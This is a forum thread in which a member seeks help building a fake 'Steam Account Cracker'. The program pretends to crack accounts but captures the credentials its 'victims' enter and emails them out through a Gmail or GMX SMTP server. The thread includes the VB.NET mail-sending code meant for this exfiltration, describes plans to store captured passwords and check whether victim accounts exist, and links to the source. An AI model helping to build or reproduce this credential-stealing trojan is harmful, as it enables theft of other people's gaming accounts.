Steam Account Cracker - Fake

nalsi

FS Member
Need some help with my Steam Account Cracker (fake of course).
You only need to write can't connect to steam or something like that.
But over to the problems I can't find any mail service(smtp) that works with vb.
My code to send the mail:
Code:
Imports System.Net.Mail

Public Class Form1

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

        Try
            Dim SmtpServer As New SmtpClient()
            Dim mail As New MailMessage()
            SmtpServer.Credentials = New  _
            Net.NetworkCredential("username", "password")
            SmtpServer.Port = 465
            SmtpServer.Host = "smtp.gmail.com"
            SmtpServer.EnableSsl = True
            mail = New MailMessage()
            mail.From = New MailAddress("email-address")
            mail.To.Add("[email protected]")
            mail.Subject = "Test Mail"
            mail.Body = "This is for testing SMTP mail from Gmail"
            SmtpServer.Send(mail)
            MsgBox("mail send")
        Catch ex As Exception
            MsgBox(ex.ToString)
        End Try

    End Sub

    Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
        End
    End Sub
End Class
 
Gmail works. I can't find the exact code right now but I'm sure if you search for "send mail gmail vb6" on google something useful will turn up.
 
Thanks, but I have choosen gmx.com that mail server works good.

Okay, now I have I possibility to save the generated passwords(fake of course).
But I want to could check if they enter a fake user. Is that possible?
I know that steamCooker know how to do this but.
 
New update:
Have found a method to check if the account exists and a method to check if the victim exists. But the code doesn't work. Something with the if codes :confused:

Download the source: here
 
Back
Top